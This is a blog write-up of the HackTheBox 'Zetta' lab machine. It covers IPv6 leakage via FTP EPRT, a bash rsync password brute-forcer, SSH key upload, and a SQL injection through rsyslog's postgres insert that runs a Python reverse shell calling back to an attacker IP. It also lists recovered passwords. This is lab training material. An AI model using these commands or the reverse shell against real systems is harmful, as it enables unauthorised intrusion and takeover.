Shubham Kumar HomeAboutDonateSubscribeArchivesCategoriesTagsProjectsContact Me
HackTheBox - Zetta
|htbmachinesretired|

Summary

Zetta,a Linux box created by HackTheBox user jkr, was an overall hard difficulty box.The initial foothold was finding the ipv6 address using FPX from FTP. Enumerating again we find a new port 8370 as rsync,enumerating that we find we can upload ssh key and get a shell as user.from here this was a really hard box first we find the .tudu.xml file which contain the todo-list by roy.then we see that rsyslog is installed so we try to look at its config we see we can’t read that but we can copy the .git folder inside /etc/rsyslog.d and do git stash to get the config, we see we local7.info is pushed to postgres db. seeing nothing else interesting i started to poke around and try an SQLi there and with lot of effort we get a shell as postgres and we see a .psql_history file which contain the password for postgres also from a hint from roy todo we get the password for root and we have pwned Zetta

Initial Enumeration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
# Nmap 7.70 scan initiated Sun Sep  1 23:24:10 2019 as: nmap -sC -sV -oN nmap/zetta 10.10.10.156
Nmap scan report for 10.10.10.156
Host is up (0.14s latency).
Not shown: 997 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Pure-FTPd
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
|   2048 2d:82:60:c1:8c:8d:39:d2:fc:8b:99:5c:a2:47:f0:b0 (RSA)
|   256 1f:1b:0e:9a:91:b1:10:5f:75:20:9b:a0:8e:fd:e4:c1 (ECDSA)
|_  256 b5:0c:a1:2c:1c:71:dd:88:a4:28:e0:89:c9:a3:a0:ab (ED25519)
80/tcp open  http    nginx
|_http-server-header: nginx
|_http-title: Ze::a Share
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Sep  1 23:24:39 2019 -- 1 IP address (1 host up) scanned in 29.54 seconds

Initial nmap scan show that we can get see 21,22,80

when we see the webpage we can see a ftp creds to login on ftp

using that when we login to ftp we also see an RFC

we also see that same line on ftp when we login

1
230-This server supports FXP transfers

so we start take a look on the RFC.

using that information we can leak the IPv6 address of the box using

1
2
3
ftp> quote EPRT |2|dead:beef:2::XXXX|1234|
200 PORT command successful
ftp> quote list

and have a

1
2
$ nc -6 -nvlp 1234
Connection received on dead:beef::250:56ff:feb9:d97e 52516

and we the IPv6 address of the box
and we get ipv6 as dead:beef::250:56ff:feb9:d97e

*Note: The IPv6 address keep changing

User

1
2
3
4
5
6
7
8
9
10
11
12
# Nmap 7.80 scan initiated Tue Dec 31 08:45:53 2019 as: nmap -p- -oA nmap/all-6 -6 dead:beef::250:56ff:feb9:d97e
Nmap scan report for dead:beef::250:56ff:feb9:d97e
Host is up (0.13s latency).
Not shown: 65530 closed ports
PORT      STATE    SERVICE
21/tcp    open     ftp
22/tcp    open     ssh
80/tcp    open     http
8730/tcp  open     unknown
63563/tcp filtered unknown

# Nmap done at Tue Dec 31 09:48:37 2019 -- 1 IP address (1 host up) scanned in 3763.57 seconds
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
# Nmap 7.80 scan initiated Tue Dec 31 09:49:53 2019 as: nmap -p 8730 -sC -sV -oN nmap/zetta-8730 -6 dead:beef::250:56ff:feb9:d97e
Nmap scan report for dead:beef::250:56ff:feb9:d97e
Host is up (0.13s latency).

PORT     STATE SERVICE VERSION
8730/tcp open  rsync   (protocol version 31)

Host script results:
| address-info:
|   IPv6 EUI-64:
|     MAC address:
|       address: 00:50:56:b9:d9:7e
|_      manuf: VMware

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 31 09:49:54 2019 -- 1 IP address (1 host up) scanned in 1.27 seconds

we try to list all the modules using

1
rsync --port=8730 -av zetta.htb::

we get

1
2
3
4
5
6
7
8
9
bin             Backup access to /bin
boot            Backup access to /boot
lib             Backup access to /lib
lib64           Backup access to /lib64
opt             Backup access to /opt
sbin            Backup access to /sbin
srv             Backup access to /srv
usr             Backup access to /usr
var             Backup access to /var

but we get error when we try them we get error we see only one thing missing that is etc.
so we try that too and

1
rsync --port=8730 -av zetta.htb::etc .

we can download all the files in etc, reading the rsyncd.conf we see that [etc] and [home_roy] where hidden and [home_roy] require password secrets file = /etc/rsyncd.secrets

1
2
3
4
5
6
7
8
9
10
11
12
# Syncable home directory for .dot file sync for me.
# NOTE: Need to get this into GitHub repository and use git for sync.
[home_roy]
        path = /home/roy
        read only = no
        # Authenticate user for security reasons.
        uid = roy
        gid = roy
        auth users = roy
        secrets file = /etc/rsyncd.secrets
        # Hide home module so that no one tries to access it.
        list = falses

and [home_roy] require password because of secrets file = /etc/rsyncd.secrets

1
2
3
4
5
6
7
8
9
10
#!/bin/bash
while IFS= read -r line; do
    echo "Trying: "$line
    sshpass -p $line rsync --port=8730 -av roy@zetta.htb::home_roy 2>1 1>/dev/null
    if [[ $? -eq  0 ]];
    then
     echo "Found Password: " $line
     exit 0
   fi
done < /usr/share/wordlists/rockyou.txt

and with this we get the password as computer.

Lets generate a ssh key and upload that to get a shell as user.

1
rsync -6avrzh .ssh rsync://roy@zetta.htb:8730/home_roy/

and another interesting thing is

and we also get user.txt

a575bdb345f2de0a3172c8282452be91

Privilege Escalation

In the todo of roy we see that we have rsyslog setup to push to postgres.

we see he had setup rsyslog for logging and pushing the data to postgres db.
but we don’t have the credential for that

we copy the /etc/rsyslog.d as the file was not readable but the .git folder was, so we can copy that to /tmp folder and we can git stash to get all the files in /etc/rsyslog.d folder. but when we do git status in /etc/rsyslog.d we see that the file was modified. we see the password for postgres but that does not work

but the interesting thing we see is that a insert query and we think we can do a sqli on that to get a shell.

After trying lot of things we were able to get the shell.

The Character \$\$ was used as a replacement for ' and get the shell using

1
logger -p local7.info "\$',now());DROP TABLE IF EXISTS test;CREATE table test (t TEXT);COPY test from program \$\$python3 /tmp/rev.py\$\$;-- -"
1
2
3
4
5
6
7
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.10.X.X",4444));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

and we get a shell as postgres users

in the postgres shell
when we enumerate we see a password inside ``var/lib/postgresql/.psql_history`

1
ALTER USER postgres WITH PASSWORD 'sup3rs3cur3p4ass@postgres';

also from the hint from roy we try sup3rs3cur3p4ass@root as password for root and we get the shell

and we can read root.txt b9407e837fb779abc934d6db89ed4c42

and we have pwned Zetta 💃

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/zetta/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
linuxwriteupretiredhacktheboxhardsqlifpxrsynctudursyslogpsql_history